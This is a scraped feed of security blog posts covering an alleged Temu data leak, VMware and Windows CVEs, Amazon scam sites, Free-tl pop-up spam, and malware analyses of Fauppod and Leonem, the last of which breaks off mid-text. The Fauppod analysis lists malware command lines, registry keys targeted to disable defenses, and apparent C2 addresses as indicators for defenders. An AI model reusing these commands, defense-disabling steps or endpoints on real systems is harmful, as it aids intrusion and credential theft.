Stephanie Adlam https://gridinsoft.com/blogs/author/adlam/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Wed, 18 Sep 2024 23:40:38 +0000 en-US hourly 1 https://wordpress.org/?v=76766 200474804 Temu Allegedly Hacked, Data Put on Sale On The Darknet https://gridinsoft.com/blogs/temu-hacked-data-sold-on-darknet/ https://gridinsoft.com/blogs/temu-hacked-data-sold-on-darknet/#respond Wed, 18 Sep 2024 22:47:31 +0000 https://gridinsoft.com/blogs/?p=27068 Chinese retailer Temu allegedly suffered a huge data breach. Hackers have put a leaked database for sale on the Darknet, which contains 87 million records with customer information. The company, however, completely denies being hacked or experiencing a data leak. This suggests the possibility that the data was just scraped from other sources. Temu Hacked,… Continue reading Temu Allegedly Hacked, Data Put on Sale On The Darknet

The post Temu Allegedly Hacked, Data Put on Sale On The Darknet appeared first on Gridinsoft Blog.

]]>
Chinese retailer Temu allegedly suffered a huge data breach. Hackers have put a leaked database for sale on the Darknet, which contains 87 million records with customer information. The company, however, completely denies being hacked or experiencing a data leak. This suggests the possibility that the data was just scraped from other sources.

Temu Hacked, Hackers Sell Leaked Data

On Monday, September 16, a hacker with the nickname smokinthashit published a post on the hacker forum BreachForums that contains Temu’s user database. The attacker claims that the database contains 87 million records. The database reportedly contains usernames, identifiers, IP addresses, full names, birth dates, phone numbers, shipping addresses, and hashed passwords. As proof, the attacker published samples of the stolen data.

Threat actor's post on BreachForums screenshot
Threat actor’s post on BreachForums (Source: BleepingComputer)

Temu is a Chinese shopping platform that operates pretty much around the world. It offers a variety of goods at relatively low prices. Despite numerous jokes about the quality of goods from Temu, the price-quality ratio allows the service to enjoy great popularity among buyers. It is not surprising that such a statement by cybercriminals caused such a fuss among users of the service.

Temu’s response

Security researchers contacted Temu representatives and asked them to comment on the situation. However, the company categorically denied any data leak. Temu said they examined the samples published by the attackers and found no matches with their databases. The platform representatives also clarified that they take user data privacy seriously and have the app’s MASA certification. They also have independent security validations, a HackerOne bug bounty program, and comply with the PCI DSS payment security standard.

Temu’s security team has conducted a comprehensive investigation into the alleged data breach and can confirm that the claims are categorically false; the data being circulated is not from our systems. Not a single line of data matches our transaction records. We take any attempt to tarnish our reputation or harm our users extremely seriously and reserve the right to pursue legal action against those responsible for spreading false information and attempting to profit from such malicious activities. At Temu, the security and privacy of our users are paramount. We follow industry-leading practices for data protection and cybersecurity, ensuring that consumers can shop with peace of mind on our platform.Temu representative

For their part, the attackers went on to claim that they had indeed hacked Temu. They also claimed they still had access to the company’s internal dashboards and knew of the vulnerabilities in the code. However, they provided no evidence to support this claim. In any case, as a security measure, service users are recommended to enable two-factor authentication and change their passwords. In addition, against the backdrop of the incident, astrologers announced an increase in phishing attempts related to Temu and online shopping.

May Users be in Danger?

Although such statements from hackers are not usually made without any proof, there is no reason to believe them now. According to the responses from Temu’s representatives and attackers, it appears to be a database compiled through web scraping from various sources rather than a fresh breach. However, If the data breach is confirmed, it would suggest that sensitive information like actual shipping addresses, bank card details, and purchase history has been leaked online. Still, taking preventive measures like changing your password and enabling 2FA is always a good idea.

The post Temu Allegedly Hacked, Data Put on Sale On The Darknet appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/temu-hacked-data-sold-on-darknet/feed/ 0 27068
Critical VMWare vCenter Server RCE Vulnerability Fixed https://gridinsoft.com/blogs/vmware-vcenter-server-rce-vulnerability/ https://gridinsoft.com/blogs/vmware-vcenter-server-rce-vulnerability/#respond Wed, 18 Sep 2024 14:06:14 +0000 https://gridinsoft.com/blogs/?p=27061 On Tuesday, September 17, Broadcom released a security update that fixes a critical remote code execution flaw in VMWare vCenter Server software. Disclosed upon the patch release, this flaw has got a significant CVSS score of 9.8, reflective of how severe the exploitation consequences can be. The company offers no mitigation ways, just installing the… Continue reading Critical VMWare vCenter Server RCE Vulnerability Fixed

The post Critical VMWare vCenter Server RCE Vulnerability Fixed appeared first on Gridinsoft Blog.

]]>
On Tuesday, September 17, Broadcom released a security update that fixes a critical remote code execution flaw in VMWare vCenter Server software. Disclosed upon the patch release, this flaw has got a significant CVSS score of 9.8, reflective of how severe the exploitation consequences can be. The company offers no mitigation ways, just installing the latest security update.

VMWare vCenter Server RCE Vulnerability Disclosed

Under the course of the last update for the vCenter Server, Broadcom, a parent company of VMWare released a fix for two vulnerabilities in this software. A more severe of two – CVE-2024-38812 – is a remote code execution flaw present in the local implementation of a remote procedure call (RPC) protocol. More specifically, the vulnerability falls under the CWE-122 specification, which stands for heap overflow.

Official note VMWare
Official Broadcom notification about the flaw

By sending a specially crafted network packet, adversaries can overflow the memory of the program. This, in turn, forces it to execute code that they need. Such a flaw can circumvent both security policies of the program and, in quite a few cases, stand-alone security solutions. Considering that vCenter Server is a well-known and trusted software piece, security vendors do not check it too thoroughly. Also, there is another software solution from VMWare that has this flaw – their Cloud Foundation suite.

Vulnerability in a virtualization software like vCenter can hit pretty badly, especially when these virtualized environments are connected directly to the rest of the enterprise network. And even when everything is set up correctly, a spyware or a backdoor can create quite a mess in the infected virtual machine. What is worse, however, is the possibility of lateral movement and deployment of other malicious programs with the same exact malware. Sooner or later, attackers will find the way to “mainland” network, shall the vulnerability remain unpatched.

Another Flaw of vCenter Server

RCE heap overflow vulnerability is not the only weakness that Broadcom has fixed in this update. Another, slightly less severe flaw, coded CVE-2024-38813, allows attackers to escalate privileges to root level. Same as in the previous flaw, all they need for execution is a specially configured network package, sent to the vCenter environment. This makes up for its high CVSS score – 7.5, while other properties of the flaw are less severe otherwise.

As the virtualized environment has little to no connection to actual hardware, root-level privileges won’t give any more access than what the VM settings allow. So unlike with the RCE flaw, adversaries will not be able to use this vulnerability for initial access or lateral movement. At the same time, it may be pretty useful as an auxiliary tool: high privileges are always usable in any attack scenarios.

Mitigation and Patches

As I’ve mentioned in the introduction, Broadcom does not offer any other fix for the vulnerability other than installing the update. That is unfortunate, as updating all the virtualized infrastructure may turn out to be a rather tedious task. But the deep nature of both vulnerabilities supposes that there’s not much one can do by themselves, except for closing the environment from external network connections.

List of vulnerable and fixed software versions

Software Versions vulnerable Fixed in
vCenter Server all 8.0 and 7.0 8.0 U3b 7.0 U3s
VMware Cloud Foundation all 4.x and 5.x Async patch to 8.0 U3b/7.0 U3s

The post Critical VMWare vCenter Server RCE Vulnerability Fixed appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/vmware-vcenter-server-rce-vulnerability/feed/ 0 27061
Amazon Prime Day Scams and Fake Amazon Websites https://gridinsoft.com/blogs/amazon-prime-day-scam/ https://gridinsoft.com/blogs/amazon-prime-day-scam/#respond Mon, 16 Sep 2024 09:31:33 +0000 https://gridinsoft.com/blogs/?p=15911 Amazon Prime Day scams is a name for fraudulent schemes that parasite on a sell-off day of the famous retailer. Such events pose a significant moment for retailers, but they also present an opportunity for scammers for taking advantage of unsuspecting shoppers. Whole networks of scam pages that mimic Amazon are created, and in this… Continue reading Amazon Prime Day Scams and Fake Amazon Websites

The post Amazon Prime Day Scams and Fake Amazon Websites appeared first on Gridinsoft Blog.

]]>
Amazon Prime Day scams is a name for fraudulent schemes that parasite on a sell-off day of the famous retailer. Such events pose a significant moment for retailers, but they also present an opportunity for scammers for taking advantage of unsuspecting shoppers. Whole networks of scam pages that mimic Amazon are created, and in this article, I will show what they are, and how to avoid them.

Amazon Prime Day Scams

Prime Day takes place for two consecutive days every year. Shoppers are eager for Prime Day deals, but so are scammers, who aim at defrauding people for their own profit. A classic scam includes an email asking customers to verify their account, leading them to a fake Amazon website to steal their personal information.

Amazon Prime Day Scams
An example of a phishing email

Experts say most phishing scams targeting Amazon customers rely on their lack of understanding of how the retailer communicates with individuals. Scott Knapp, Amazon’s Director of Worldwide Buyer Risk Prevention, stated that company representatives rarely contact shoppers directly or ask for order details. Nonetheless, there are plenty of other directions of the fraud that you should be aware of.

Fake Amazon Websites

One of the frequent types of scams is fake websites that superficially resemble the original service or store. I have analyzed two typical examples of such sites, Amazonexal[.]com and Lainedmn[.]com (shut down at the moment). Both claim to be a branch of Amazon and offer items at heavily discounted prices. But obviously, there are no such branches of the company, and both sites gather a complete scam bingo.

Fake Amazon Websites
Screen of fake Amazon website
  • Websites’ age may vary, but the content almost always changes every 2-3 weeks. That is done to scatter the complaints and pretend that earlier trades related to the site never happened.
  • Both websites use content from amazon.com and the Amazon logo but they do not have any official affiliation with Amazon. That is, in fact, a huge red flag for any type of shopping site: lacking your own content puts in question the presence of offered goods in the first place.
  • None of the sites have reviews and feedback. Some of the pages have the “feedback section”, that in fact consists of made up writings lodged into the site, without the ability to add your own comment.
  • None of the sites have a social media presence besides victims’ complaints online. Even if there are visible buttons for Instagram, Twitter or Facebook pages, they are not active 99% of the time.
  • Both websites offer ridiculous discounts and elements that infuse a sense of urgency, so the user is constantly pushed towards making a purchase.

Fraud experts assert that in the past 30 days alone, 2,300 new website domains were registered impersonating Amazon. This is just the beginning, and the higher the price, the more fake sites will be created. These fraudulent sites also offer what appears to be a copy of a legit payment page. Most likely, these pages collect all the banking information one types in, so there is also a risk of banking account hijack. Here the list of latest fake websites were used in the scam:

  • Amazon-activity[.]com
  • Amazonexal[.]com
  • Amazon.com.billing-inquiry[.]com
  • Lainedmn[.]com
  • amazon-store[.]com
Fake Amazon Websites
Fake form to collect personal data

Fake Gift Cards and Promo Codes

Another possible vector for Amazon Prime Day scams is fake gift cards and promo codes, that provide significant discounts to anything you buy. While genuine Amazon gift cards promo codes can be found on trustworthy websites, scammers may impose such services, offering to buy these gift cards of promo codes from them.

You can get to such a fraudulent deal while browsing sites and forums related to Amazon shopping. Once in, you will see gift cards for sale at 10-25% of their real value (i.e. $100-250 for a $1000 gift card). Thing is – site owners don’t have any codes to share with you, and after receiving your pay they cut any communication.

Fake Coupons and Promos
Example of fake ads

Another edge of this scam is free gift cards giveaways. The are in fact more of a constant theme, rather than a seasonal occurrence. Frauds set up a landing page that offers users to get a free $500-$1000 gift card only for sharing their personal data. As you may already know, this data share is one way – no one sends back any free stuff.

How to report a scam

  • If you have been scammed, report it to Amazon support through their official website or phone number.
  • You should inform your bank as soon as possible. This increases their chances of stopping the fraudster.
  • Finally, report the scammers to the platform through which they contacted you.
  • If you’re concerned that your Amazon account may be at risk, the seller’s website has tips to help protect your information.

Tips for safe Prime Day shopping

We have some helpful tips to prevent falling victim to scams. It is better to follow them all rather than picking one separate, as there is no universal solution.

  • Double-check domain names. If the website address does not start with “Amazon.com,” it could be fraudulent. This applies to other online retailers as well. Look for misspellings, extra punctuation, or anything unusual in the address.
  • Stick to Amazon’s official website, app, and stores for purchases. Amazon never asks for payment over the phone/email or through third-party sites.
  • It’s safer to enter retailer URLs manually rather than clicking on potentially harmful links. If you receive a suspicious message, claiming that you ordered something, go to «amazon.com» and check your Amazon account’s “My Orders” section to confirm.
  • Use a strong password and enable two-factor authentication. Passwords should be extended, unique, and random. Avoid reusing passwords across multiple accounts.
  • Treat limited-time Prime Day deals with caution. Offers requiring immediate purchase may be cybercriminal traps.

Scammers don’t take breaks, and with Prime Day around the corner. So, it’s essential to remain vigilant against fraud. The tips we’ve provided can help safeguard you against online scams.

The post Amazon Prime Day Scams and Fake Amazon Websites appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/amazon-prime-day-scam/feed/ 0 15911
Top 3 Vulnerabilities of 2024: How to Block and Prevent https://gridinsoft.com/blogs/top-3-vulnerabilities-block-prevent/ https://gridinsoft.com/blogs/top-3-vulnerabilities-block-prevent/#respond Sun, 15 Sep 2024 18:14:59 +0000 https://gridinsoft.com/blogs/?p=14091 Any successful remote cyberattack starts with penetration of the target network. Regardless of the type of threat (spyware, ransomware, or infostealer), first it must be delivered before it can be deployed. Attackers use a variety of methods and tools to accomplish this. Some of them require some action on the part of the individual. Others,… Continue reading Top 3 Vulnerabilities of 2024: How to Block and Prevent

The post Top 3 Vulnerabilities of 2024: How to Block and Prevent appeared first on Gridinsoft Blog.

]]>
Any successful remote cyberattack starts with penetration of the target network. Regardless of the type of threat (spyware, ransomware, or infostealer), first it must be delivered before it can be deployed. Attackers use a variety of methods and tools to accomplish this. Some of them require some action on the part of the individual. Others, in turn, rely on vulnerabilities in the system and can be delivered and deployed without the victim’s involvement.

Top Vulnerabilities in 2024

From quite a few vulnerabilities that surfaced in 8 months of 2024, there are several that created significant fuss in the cybersecurity community. Key sign of the significance is, of course, the number of systems that may be impacted. Though, I won’t ignore other factors, like ease of exploitation and severity of possible consequences.

How Do Vulnerabilities Works?
How Do Vulnerabilities Works?

There may also be a confusion on whether the flaw should be considered “top” or not depending on the frequency of its exploitation in cyberattacks. As some of the flaws keep circulating years after the initial discovery, you can sometimes see ratings that include those “past” vulnerabilities. For certain years, these overdue weaknesses were dominant, despite all the vulnerabilities discovered the same year. In this article, I will concentrate exclusively on ones discovered in 2024, with all the other mentioned characteristics in mind.

Critical RCE Threat in Windows TCP/IP Stack

CVE-2024-38063 is a critical vulnerability in Windows 10/11 that allows remote code execution (RCE) via IPv6 packets. The vulnerability is rated CVSS 9.8 and affects Windows 10, Windows 11 and Windows Server 2008-2022. Security researcher Marcus Hutchins has published a detailed analysis of the vulnerability. He also noted that this vulnerability affects one of the most exposed parts of the Windows kernel, the tcpip.sys driver, which is responsible for processing TCP/IP packets. In other words, attackers can exploit this vulnerability by sending specially crafted IPv6 packets to the target machine, allowing RCE without user interaction.

For potential risks, if successful, attackers could gain access at the SYSTEM level. This eventually allows them to execute arbitrary code on the vulnerable system and compromise sensitive data. The former, in turn, is a classic way to deploy malware in cyberattacks of different grades. Microsoft has released the update and strongly recommends applying it as soon as possible. For ones who cannot apply the patch, Redmond recommends disabling IPv6 until the update becomes available in order to reduce the attack surface.

Fortunately, there were no exploitation cases known to the moment. But the fact that the vulnerability exposes individual users and corporations alike makes it worth keeping in mind and fixing when the opportunity arises.

Critical Remote Code Execution in Microsoft Project

Vulnerability CVE-2024-38189 is a critical remote code execution vulnerability that affects some Microsoft products. It affects Windows 10 and Windows Server 2019 and later, as well as various versions of Office, including Office 365. CVSS score of 8.8 clearly characterizes how much damage the attackers can do with this flaw. Unlike the previous vulnerability, exploiting CVE-2024-38189 requires user interaction, namely the attacker must convince the victim to open a special Microsoft Project file. However, in the era of Dark LLM-generated phishing emails, this will not be a problem for attackers.

The results of successful exploitation of this vulnerability are clear – remote access with privilege escalation. It can lead to data leakage and full control over the infected system, with potentially severe consequences. Microsoft has released an update, so the only task for users is to apply the update and pay attention to monitoring suspicious network activity. And with the vulnerability being actively exploited in the wild, this update should not be hesitated with.

RCE Flaw in Microsoft Exchange

The third vulnerability is CVE-2024-38178, which has a CVSS score of 7.5 and allows remote code execution attacks under certain conditions. Although this is a specific vulnerability, it poses a significant threat. Similar to the previous point, exploitation of this vulnerability requires an authenticated client to be tricked into clicking a malicious link. Moreover, the exploitation also requires the victim to use Microsoft Edge in Internet Explorer mode. However, South Korea’s National Cyber Security Center has reported that this vulnerability was potentially used in a state-sponsored APT attack.

The vulnerability arises from a flaw in web content processing, leading to remote code execution. This could result in unauthorized server control, data leaks, and significant server disruption. The attacker does not require direct access to the server, relying instead on tricking users. To ensure security, users should update their systems and consider disabling Internet Explorer mode in Microsoft Edge.

What Causes the Vulnerabilities to Appear?

Typical reasons for vulnerabilities to appear in programs is a bad software engineering, technology aging, software misusage, or all of them together. It is hard to trace the reason for each and every specific vulnerability, especially considering the sheer number of them. But it is obvious that the more complex the program is – the easier it is for something inside to broke, or be broken on purpose.

Windows update
Make sure your system is up to date

The worst part about it is that you can’t really do anything to prevent the vulnerabilities from appearing (if you are not the developer of course). For users, and even corporations, the only way to secure themselves against negative consequences of vulnerability exploitation is to install all the recent updates. And even this won’t always be a guarantee of having no zero-day flaws.

How to prevent vulnerabilities?

To summarize, let me make a few recommendations to help reduce the likelihood of successful exploitation of vulnerabilities:

  • Install the latest updates. Proper software developers releases flaw fixes as part of their regular updates, and I strongly recommend not to ignore them. If it happens for you to use an end-of-service program, it is better to update to the newest version or seek for an alternative that still gets software updates. “Unsupported” does not mean “free of vulnerabilities”!
  • Use software from reliable developers. While vulnerabilities can appear in any software, from any developer, the likelyhood of this happening is much higher when you stick to solutions of no-name dev team. Large and renowned developers, aside from doing thorough testing, will also provide all the needed support and updates for their software.
  • Keep an eye on security news. Companies sometimes struggle with notifying their users in a timely manner. By checking out newsletters, you ensure being up to date about the recent flaws or attacks.
  • Top 3 Vulnerabilities of 2024: How to Block and Prevent

    The post Top 3 Vulnerabilities of 2024: How to Block and Prevent appeared first on Gridinsoft Blog.

    ]]> https://gridinsoft.com/blogs/top-3-vulnerabilities-block-prevent/feed/ 0 14091 Free-tl Pop-Up Virus https://gridinsoft.com/blogs/free-tl-pop-up-virus/ https://gridinsoft.com/blogs/free-tl-pop-up-virus/#respond Thu, 12 Sep 2024 15:57:07 +0000 https://gridinsoft.com/blogs/?p=27022 Analysis shows a hike in the number of malicious pop-ups that come from Free-tl websites. It is a rather common strategy of aggressive marketing that aims to spam users after forcing them to allow sending notifications from the aforementioned websites. Let’s figure out what this scam is, and how to stop “Free tl” pop-ups. What… Continue reading Free-tl Pop-Up Virus

    The post Free-tl Pop-Up Virus appeared first on Gridinsoft Blog.

    ]]>
    Analysis shows a hike in the number of malicious pop-ups that come from Free-tl websites. It is a rather common strategy of aggressive marketing that aims to spam users after forcing them to allow sending notifications from the aforementioned websites. Let’s figure out what this scam is, and how to stop “Free tl” pop-ups.

    What are Free-tl pop-up notifications?

    Pop-up notifications from Free-tl sites are a spam campaign that aims to earn money from pay-per-view and pay-per-click advertisements. There is an entire chain of such sites, created by the same group of cybercriminals and existing for the same purpose. Frauds who stand behind all this lure people into pressing the “Allow notifications” button that appears as soon as one enters the site. This demand may be framed as a form of captcha, DDoS protection, or the like.

    List of domains involved in a scam

    URL Registered Scan report
    Free-tl-100-a.buzz 2024-09-12 Report
    Free-tl-100-b.buzz 2024-09-12 Report
    Free-tl-100-c.buzz 2024-09-12 Report
    Free-tl-100-d.buzz 2024-09-12 Report
    Free-tl-100-e.buzz 2024-09-12 Report
    You can conduct your investigation using our Inspector API by performing a search with the key “Free-tlhere.

    One particular source of the redirections to Free-tl sites is by browsing sites with illegal or explicit content. Websites that host pirated movies or games, adult sites – clicking anything on such pages may trigger the redirection to the scam site that will ask you to allow notifications. That twisted form of cooperation is what makes me warn people against using such sources of software and movies.

    Allow notifications request free-tl site
    Example of the “Allow notifications” page

    Interesting thing about the pop-up spam sites is that they work only after the redirection. Simple checks show that opening the scam page requires a correct link. Visiting the root domain, without the additional parameters in the URL, will return either a 404 error or a boilerplate that says the URL is for sale.

    How dangerous are Free-tl pop-ups?

    Once the user allows notifications from one of the Free-tl websites, it bombards them with pop-ups. These notifications appear in the system tray, offering gambling, adult sites, or trying to scare the user by saying the system is infected. Clicking on a pop-up will send the user to a website with questionable content. It is also common to see phishing pages promoted in such a way, which forms the main concern of this pop-up spam.

    free-tl-100-a.buzz
    Example of a fake antivirus warning that the “Free tl” site can send

    Another angle of the problem is the offer to install some questionable software to solve non-existent problems. You might encounter a so-called Microsoft tech support scam page or a site that pretends to scan your PC, falsely reporting that there are hundreds of malicious programs running at the moment. To make it harder for the user to quit, scammers make these sites open in a full-screen mode, so there is no visible way out. Of course, unless someone presses the Escape button.

    But scams and phishing aside, the key issue with all this is the fact that constant pop-ups are extremely annoying. Because of the way Windows shows notifications, they will appear on top of any app that is currently running. It’s simply hard to concentrate on your task when you constantly hear and see banners popping up one after another. And, well, it will be quite an embarrassing moment when your boss walks by while there is a pop-up with hot girls around you on the screen.

    How to remove Free-tl pop-ups?

    It is possible to remove the pop-up source manually, through the browser interface. For this, go to your browser settings, find notification settings and remove all the sites that are listed as ones that can send notifications. Reload the browser to apply the changes.

    There is also the second step – malware removal. It is possible that the Free-tl pop-ups appearance is caused by the activity of adware or browser hijackers. These two malware types often cause redirections, and may alter web browser settings to their needs. For that reason, I recommend scanning the system with GridinSoft Anti-Malware: it will clear whether there is something malicious on your device, or not. Download it, install and run a Standard scan: this will check the places where the said malware typically keeps its files.

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

    Removal finished

    The post Free-tl Pop-Up Virus appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/free-tl-pop-up-virus/feed/ 0 27022
    Trojan:Win32/Fauppod!ml https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/ https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/#respond Thu, 12 Sep 2024 15:25:21 +0000 https://gridinsoft.com/blogs/?p=26999 Trojan:Win32/Fauppod!ml is a detection that is based on machine learning and is assigned to an unspecified threat type. Usually such threats are identified by behavior rather than signatures. Nonetheless, this exact malware detection poses a serious hazard, as it appears to flag the activity of a targeted infostealer trojan. Trojan:Win32/Fauppod!ml Overview Trojan:Win32/Fauppod!ml is a generic… Continue reading Trojan:Win32/Fauppod!ml

    The post Trojan:Win32/Fauppod!ml appeared first on Gridinsoft Blog.

    ]]>
    Trojan:Win32/Fauppod!ml is a detection that is based on machine learning and is assigned to an unspecified threat type. Usually such threats are identified by behavior rather than signatures. Nonetheless, this exact malware detection poses a serious hazard, as it appears to flag the activity of a targeted infostealer trojan.

    Trojan:Win32/Fauppod!ml Overview

    Trojan:Win32/Fauppod!ml is a generic detection name that Microsoft Defender assigns to malware detected by its AI detection system. Typically, this detection points at the activity of an infostealer that primarily targets banking data. The “ml” in the detection name exactly indicates the use of a machine learning system, rather than traditional signature-based detection methods. Usually, over time, as more information about its behavior is analyzed, this detection gets a more specific detection name.

    Trojan:Win32/Fauppod!ml detection window screenshot
    Trojan:Win32/Fauppod!ml detection window

    As mentioned at the beginning, the main goal of Fauppod is to steal the credentials of online accounts. One thing it goes for in particular is login credentials for online banking accounts.

    Main spreading ways of this malware are malicious email attachments (attached Word or Excel files) in emails, or via sketchy game mods or other files from sketchy sources. Despite targeting specifically banking information, it is not picky about its victims, stealing info from all categories of users.

    Fauppod Analysis

    Let’s take a closer look at the technical part of how Fauppod!ml behaves on the system. The first thing the malware does after launching is to check if it is the only copy of malware running on the device. It achieves this by creating and accessing mutexes:

    \Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex.
    \Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex.

    Since our example is a DLL file, it needs a legitimate Rundll32.exe process to run. The malware copies the legitimate Rundll32.exe file to the temporary folder C:\Users\User\AppData\Local\Temp\rundll32.exe and utilizing process hijacking techniques.

    Next, the malware checks the UAC status and the presence of anti-malware on the system. It checks these registry keys to disable system defenses and ensure persistence:

    HKEY_LOCAL_MACHINE\SOFTWARE
    HKEY_CURRENT_USER\Software\Policies
    HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Security
    HKEY_CURRENT_USER\Software\Microsoft/Windows NT\CurrentVersion
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft/Windows\CurrentVersion\Uninstall

    Fauppod Execution

    The malware executes shell commands that allow it to perform its main function:

    C:\Users\User\AppData\Local\Temp\rundll32.exe rpl909.zip.dll
    “C:\Windows\System32\rundll32.exe” C:\Users\A4148~1.MON\AppData\Local\Temp\b81d42902b581dd9fea37c4b6a8ff180.19772.dll,DllMain

    After that, the malware deploys payloads and injects itself into legitimate processes, allowing it to function without raising suspicions from security software. It also manipulates processes such as wmiadap.exe, svchost.exe and cmd.exe, which are legitimate processes. The malware executes the following processes:

    wmiadap.exe /F /T /R
    %windir%\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    %windir%\system32\wbem\wmiprvse.exe.
    %windir%\System32\svchost.exe -k WerSvcGroup
    13f43b565119f43f7155f96cafa8b05d.exe
    C:Windows/System32 loaddll32.exe loaddll32.exe “C:\Users\user\Desktop\init.dll”.
    C:Windows / Windows / SysWOW64 / cmd.exe cmd.exe /C rundll32.exe “C:\Users / User / Desktop /init.dll”,#1.
    C:Windows/sysWOW64/rundll32.exe rundll32.exe “C:\Users/User/Desktop/init.dll”,#1.
    C:\Windows/SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_Clockcould@8.
    C:\Windows/SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_DllRegisterServer@0
    C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\User\Desktop\init.dll,_Representfinish@4.

    So, we can conclude that the malware is also abusing the svchost.exe process in WerSvcGroup, which is related to the Windows Error Reporting Service. This is a common practice of malware that uses this process to mask its actions by injecting code into system services. The 13f43b565119f43f7155f96cafa8b05d.exe executable also appears to be part of the payload.

    Fauppod Connections

    The malware uses both standard addresses and ports as well as non-standard ones. Among the standard ones:

    GET watson.microsoft.comhttp://watson.microsoft.com/StageOne/rundll32_exe/6_1_7600_16385/4a5bc637/StackHash_1abe/0_0_0_0/00000000/c0000005/fd8b3a80.htm?LCID=1040&OS=6.1.7601.2.00010100.1.0.48.17514&SM=LENOVO&SPN=64755N2&BV=7UET92WW%20(3.22%20)&MID=F2EC8DC6-EB4A-4B44-95EF-9B81DC7C287B

    Using standard ports that belong to Microsoft allows you to hide your actions. On the other hand, using suspicious addresses and non-standard ports indicates communication with the C2 server. In our case, these addresses are:

    97.107.127.161:443
    45.33.94.33:5037
    159.89.91.92:5037
    158.69.118.130:1443

    Some of the IP addresses in the list (and quite a few others that I’ve excluded for the sake of readability) correspond to compromised websites. This is a oftenly used tactic: attackers use a hacked website as an intermediary command server, while the request looks legitimate for anyone who tries to find the traces.

    Is Trojan:Win32/Fauppod!ml False Detection?

    As I have mentioned several times already, Trojan:Win32/Fauppod!ml is a heuristic detection based on machine learning. This means it can sometimes result in false positives. That is, Heuristic methods analyze file patterns, behaviors, and structural elements rather than relying on pre-defined signatures. As a result, legitimate software with uncommon characteristics or behaviors may be flagged as suspicious. In such cases, after some time, the anti-malware software stops flagging the file as a threat.

    How to Remove Trojan Fauppod?

    If you encounter Trojan:Win32/Fauppod!ml and are unsure whether it’s a false detection or a real threat, an effective solution is to use a third-party anti-malware solution. GridinSoft Anti-Malware would be a great option that can both confirm the threat and disprove it. Use the instructions below to scan your device for threats.

    Trojan:Win32/Fauppod!ml

    The post Trojan:Win32/Fauppod!ml appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/trojanwin32-fauppod-ml/feed/ 0 26999
    Trojan:Win32/Leonem https://gridinsoft.com/blogs/trojan-win32-leonem/ https://gridinsoft.com/blogs/trojan-win32-leonem/#respond Wed, 11 Sep 2024 13:37:54 +0000 https://gridinsoft.com/blogs/?p=26937 Trojan:Win32/Leonem is a spyware that targets any login data on a compromised system, including saved data in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software. Trojan:Win32/Leonem Overview Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which… Continue reading Trojan:Win32/Leonem

    The post Trojan:Win32/Leonem appeared first on Gridinsoft Blog.

    ]]>
    Trojan:Win32/Leonem is a spyware that targets any login data on a compromised system, including saved data in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software.

    Trojan:Win32/Leonem Overview

    Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims at stealing sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks other stored login credentials, stored in the compromised system, including those in email clients.

    Trojan:Win32/Leonem detection popup screenshot
    Trojan:Win32/Leonem detection popup

    As for the payload, Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled add-ons with legitimate software from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.

    Technical Analysis

    Let’s now take a deeper analysis of the threat on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:

    %windir%\System32\svchost.exe -k WerSvcGroup
    wmiadap.exe /F /T /R
    %windir%\system32\wbem\wmiprvse.exe
    "%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

    Leonem retrieves BIOS information using WMI queries, specifically targeting Win32_Bios and Win32_NetworkAdapter. Additionally, it exploits the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:

    HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

    In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.

    Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all this, Leonem abuses the following legitimate processes and checks the following key values and system locations:

    C:\Windows\system32\services.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
